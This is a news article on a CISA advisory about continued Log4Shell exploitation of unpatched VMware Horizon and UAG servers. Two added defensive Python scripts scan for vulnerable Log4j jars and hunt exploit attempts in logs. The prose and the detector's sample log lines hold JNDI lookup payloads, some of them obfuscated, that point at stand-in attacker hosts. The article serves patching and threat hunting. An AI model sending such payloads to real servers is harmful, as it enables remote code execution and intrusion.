CISA: Hackers Still Use Log4Shell to Breach Networks, So Fix Your Systems


The flaw in the Log4j logging library known as "Log4Shell" should have been patched by organizations months ago, but systems that never received the available updates are still being used by attackers as a way into corporate networks.

The Cybersecurity & Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) issued a joint advisory urging administrators to patch VMware Horizon and Unified Access Gateway (UAG) servers that are running vulnerable versions of Log4j. VMware UAG provides employees with secure remote access to Horizon virtual desktops and applications.

Both VMware products were vulnerable to the Log4Shell flaw, CVE-2021-44228, which Log4j's maintainer, the Apache Software Foundation, disclosed in December 2021. VMware released patches for the affected products in December and January.
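Before patching, an administrator has to know which hosts still carry an unfixed log4j-core. The following inventory script is an added example, not code from the advisory, CISA or VMware: it walks a directory tree, opens every .jar/.war/.ear (and archives nested inside them, as in a bundled application), reads the log4j-core version from the jar's Maven pom.properties, and checks whether the JndiLookup class that Log4Shell abuses is still present, since deleting that class from the jar was the sanctioned workaround for systems that could not be patched. The sample directory tree it builds for a dry run is constructed for illustration; the fake jars contain only the two members the scanner reads.

```python
"""Inventory Log4j 2 jars on a host and flag those still exposed to CVE-2021-44228.

Scans .jar/.war/.ear files under a root (and archives nested up to two levels
deep), reads the log4j-core version from pom.properties and checks for the
JndiLookup class.  Only CVE-2021-44228 is judged; the follow-on CVEs fixed in
2.16.0 and 2.17.0 are out of scope.  Shaded jars that relocate the package
path will not be recognised.
"""
import io
import itertools
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")
# CVE-2021-44228 was fixed in 2.15.0 on the main line and backported to
# 2.12.2 (Java 7) and 2.3.1 (Java 6).
FIXED_MIN = (2, 15, 0)
FIXED_BACKPORTS = {(2, 12, 2), (2, 3, 1)}


def parse_version(v):
    """'2.14.1' -> (2, 14, 1); qualifiers such as '2.0-beta9' are dropped."""
    parts = []
    for piece in v.split("."):
        digits = "".join(itertools.takewhile(str.isdigit, piece))
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def inspect_archive(zf, path, findings, depth=0):
    """Record one finding per archive that looks like log4j-core; recurse into nested archives."""
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_CLASS in names
    if version is not None or has_jndi:
        vt = parse_version(version) if version else None
        # An unreadable version with the lookup class present is treated as unfixed.
        unfixed = vt is None or (vt < FIXED_MIN and vt not in FIXED_BACKPORTS)
        findings.append({"path": path, "version": version,
                         "jndi_lookup": has_jndi, "vulnerable": has_jndi and unfixed})
    if depth < 2:
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                try:
                    inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
                except zipfile.BadZipFile:
                    continue  # a .jar-named member that is not a zip
                inspect_archive(inner, f"{path}!{name}", findings, depth + 1)


def scan(root):
    """Return findings for every log4j-core archive under root, sorted by path."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        inspect_archive(zf, full, findings)
                except zipfile.BadZipFile:
                    continue
    return sorted(findings, key=lambda d: d["path"])


def _fake_log4j(version, with_jndi=True):
    """Constructed stand-in for a log4j-core jar: only the members the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, not bytecode
    return buf.getvalue()


def build_sample_tree(root=None):
    """Write a constructed directory tree for a dry run and return its root."""
    root = root or tempfile.mkdtemp(prefix="log4j-scan-")
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib, exist_ok=True)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(_fake_log4j("2.14.1"))                   # unpatched
    with open(os.path.join(lib, "log4j-core-2.17.1.jar"), "wb") as f:
        f.write(_fake_log4j("2.17.1"))                   # patched
    with open(os.path.join(lib, "log4j-core-2.13.3.jar"), "wb") as f:
        f.write(_fake_log4j("2.13.3", with_jndi=False))  # old, but JndiLookup removed
    with zipfile.ZipFile(os.path.join(root, "app", "portal.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.12.1.jar", _fake_log4j("2.12.1"))  # nested, unpatched
        war.writestr("WEB-INF/lib/broken.jar", b"not an archive")
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for f in scan(target):
        flag = "VULNERABLE" if f["vulnerable"] else "ok"
        print(f"{flag:10} {f['version'] or '?':8} jndi={str(f['jndi_lookup']):5} {f['path']}")
```

Run it with a root such as the VMware or application install directory; with no argument it scans the constructed sample tree. A disk scan is a starting point, not proof: it cannot see classes loaded from a path the scanner does not recognise, and a host that was exposed before patching still needs the threat hunt the advisory calls for.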


It was called Log4Shell because the bug hands an unauthenticated attacker remote code execution, in effect a shell, on any internet-reachable system that logs attacker-controlled input through a vulnerable Log4j: a string such as ${jndi:ldap://attacker-host/x} placed in a request header or URL is expanded by Log4j's JNDI lookup, which can be made to load and run code from the attacker's server.

"CISA and CGCYBER recommend that all organizations with affected systems that did not immediately apply available patches or workarounds assume a compromise and initiate threat hunting activities," CISA said.
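One place a threat hunt starts is the web and proxy logs of the exposed servers, because the exploit string has to pass through a logged field. The detector below is an added example, not from the advisory or the article: it folds the obfuscations attackers commonly apply to the ${jndi:...} lookup (URL encoding, ${lower:}/${upper:} wrappers, and the ${::-x} / ${env:UNSET:-x} default-value trick, all part of Log4j's own lookup syntax) back into plain text before matching, and reports the JNDI protocol used. The log lines are constructed for illustration in a combined-log-like shape; they are not real captured traffic.

```python
"""Hunt for Log4Shell (CVE-2021-44228) exploitation attempts in web or proxy logs.

The payload rides in any field that ends up in a Log4j message (User-Agent,
URI, other headers) and is routinely obfuscated with Log4j's own nested
lookups.  normalize() unwraps the common tricks to a fixed point before the
${jndi:...} pattern is matched.
"""
import re
from urllib.parse import unquote

# ${lower:x} / ${upper:x} resolve to their argument.  Log4j matches lookup
# prefixes case-insensitively, so lower-casing the result is safe here.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${env:UNSET:-x} and the degenerate ${::-x}: default-value syntax that
# yields "x" whenever the named variable does not exist.
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The lookup that triggers JNDI resolution, with its protocol: ${jndi:ldap:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then unwrap nested and default-value lookups until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def log4shell_indicator(line: str):
    """Return the JNDI protocol ('ldap', 'rmi', 'dns', ...) if the line carries
    a lookup payload, 'unknown' if the protocol is unreadable, else None."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    return (m.group(1) or "unknown").lower()


# Constructed sample log lines (client, request, status, referer, user-agent).
SAMPLE_LOG = [
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.11 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.12 - - "GET /?q=${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/b} HTTP/1.1" 400 "-" "curl/7.68.0"',
    '203.0.113.13 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://198.51.100.7/c}"',
    '203.0.113.14 - - "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi${env:NOPE:-:}${env:NOPE:-l}dap${env:NOPE:-:}//198.51.100.7/d}"',
    '203.0.113.15 - - "GET /%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fe%7D HTTP/1.1" 404 "-" "-"',
]


def hunt(lines):
    """Return (line_no, client_ip, protocol) for every line carrying a payload."""
    hits = []
    for n, line in enumerate(lines, 1):
        proto = log4shell_indicator(line)
        if proto:
            hits.append((n, line.split(" ", 1)[0], proto))
    return hits


if __name__ == "__main__":
    for n, ip, proto in hunt(SAMPLE_LOG):
        print(f"line {n}: {ip} sent a ${{jndi:{proto}:...}} payload")
```

A hit proves an attempt, not a compromise; the server's own Log4j-backed logs, outbound connections from the Java process to the host named in the payload, and new processes spawned by it are what turn an attempt into a confirmed intrusion. Attackers can also deliver the string through fields this sample does not show, so run the detector over every logged field rather than the User-Agent alone.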

According to CISA, the attackers used the flaw to gain access to a victim’s disaster recovery network and steal information, including administrator credentials that allowed lateral movement.

“Since December 2021, multiple groups of malicious actors have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers,” the agencies warn in the alert notice (AA22-174A).

“As part of this exploit, suspected advanced persistent threat actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In a confirmed compromise, these APT actors were able to move laterally inside the network, access a disaster recovery network, and collect and exfiltrate sensitive data,” the agencies said.

Log4j is maintained by Apache Software Foundation (ASF), but the open source component is used in a wide range of software on devices from many other vendors, including VMware, Cisco, IBM, and Oracle.


Log4Shell was considered hard to patch comprehensively because of the number of end-user organizations, device manufacturers and services involved: Log4j is embedded, often several layers deep, in products whose owners may not know it is there.

CISA director Jen Easterly said Log4Shell was “one of the most serious I’ve seen in my entire career, if not the most serious”. But in January, she confirmed that CISA had seen no significant intrusions via Log4j, although she still warned that attackers could wait for public alarm on Log4Shell to subside before exploiting affected systems.

Easterly's warning appears justified by the subsequent investigations by CISA and CGCYBER into victim networks, which show attackers using the flaw for more than installing "cryptojackers", CPU-abusing cryptomining malware.

CGCYBER conducted a threat hunting engagement at a victim organization that was running a vulnerable version of VMware Horizon and discovered that the attackers had installed malware masquerading as a legitimate Microsoft administrative tool.

At a second victim site the agencies investigated, the attackers first gained access to the VMware Horizon server and then used Windows Remote Desktop Protocol (RDP) to reach hosts in the target's production environment, including a security management server, a certificate server, a database containing sensitive law enforcement data, and a mail relay server. Exposed or credential-stuffed RDP is among the most common ways ransomware operators get into and move through a network.

The attackers at the second victim site also used RDP to access the disaster recovery network.

“Threat actors obtained credentials for multiple accounts, including administrator accounts. It is unclear how these credentials were acquired,” CISA notes.

Steven L. Nielsen